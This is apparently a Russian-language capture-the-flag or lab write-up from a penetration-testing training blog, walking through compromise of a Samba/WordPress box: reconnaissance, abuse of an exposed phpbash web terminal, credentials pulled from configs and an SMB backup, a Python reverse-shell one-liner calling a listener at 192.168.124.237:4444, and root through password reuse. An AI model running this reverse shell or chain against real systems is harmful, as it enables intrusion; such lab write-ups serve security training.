About Teletype
Join
Penetration Tester
@fnay_offensive
obuchenie_post
November 16

День 20.Таск  "Самбо"

Таск: Вы давно занимались спортом? У нас для Вас отличная новость!

Подсказка - сервис samba

1)Разведка

-NMAP-

  • 22/tcp - SSH (OpenSSH 9.9): Современная версия OpenSSH. Прямые атаки (например, брутфорс) малоперспективны, если только мы не найдем учетные данные другим способом.
  • 80/tcp - HTTP (Apache 2.4.62): Веб-сервер. Основная цель для начального взлома.
  • 139/tcp & 445/tcp - Samba (Samba smbd 4): Сетевые файловые шары. Ключевая цель! Samba часто имеет анонимный доступ или слабые настройки прав.

-DIRSEARCH-

  • Найден WordPress: Наличие папок /wp-admin, /wp-content, /wp-includes и файла xmlrpc.php явно указывает на то, что сайт работает на WordPress.
    • wp-admin/install.php возвращает 500 ошибку, значит, сайт уже установлен.
    • xmlrpc.php может быть использован для брутфорса паролей или выполнения команд.
  • Уязвимые CGI-скрипты: Найденные /cgi-bin/test-cgi и /cgi-bin/printenv — это классические векторы для атак, если они неправильно сконфигурированы. Они могут позволить выполнить код на сервере.
  • Стандартные файлы WordPress: license.txt, readme.html — по ним можно определить версию WordPress, чтобы найти известные уязвимости.
  • Папка /data/: Доступ запрещен (403), но сам факт ее существования интересен. Возможно, к ней можно получить доступ через Samba.

Так же /robots.txt показал новую страничку /phpbash.php

Которая дает доступ к терминалу

Выглядит это вот так
cmd=cd%20%2Fvar%2Fwww%2Flocalhost%2Fhtdocs%3B%20ls

Проанализируем файлы - и натыкаемся на конфиг

Видим в нем креды

admin:R-e4|D0:50Tl

Пробуем зайти по smb

Видим что в smb лежит - wordpress.bak
это архив - качаем и смотрим в нем файлы

Читаем старый конфиг и видим что в нем другие уже креды

admin:29:Lb4Yb+SAs


cmd=cd%20%2Fvar%2Fwww%2Flocalhost%2Fhtdocs%3B%20whoami - говорит что мы = apache

пробуем реверсшелл

apache@sambo:/var/www/localhost/htdocs# python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.124.237",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Авторизуемся под рут и смотрим что есть у рута в директории.

🎯 ФИНАЛЬНЫЙ РЕЗУЛЬТАТ: Получили root через Password Reuse!
Пароль от SMB (R-e4|D0:50Tl) сработал для пользователя root

Основная группа обучения ИБ
Lab-группу с полезным софтом / книгами / аудио.
Чат для обсуждений, задавай свои вопросы.
P.S. С вами был @Fnay_Offensive
До новой встречи, user_name!

Penetration Tester
November 16, 15:06
0 views
0 reactions
0 replies
0 reposts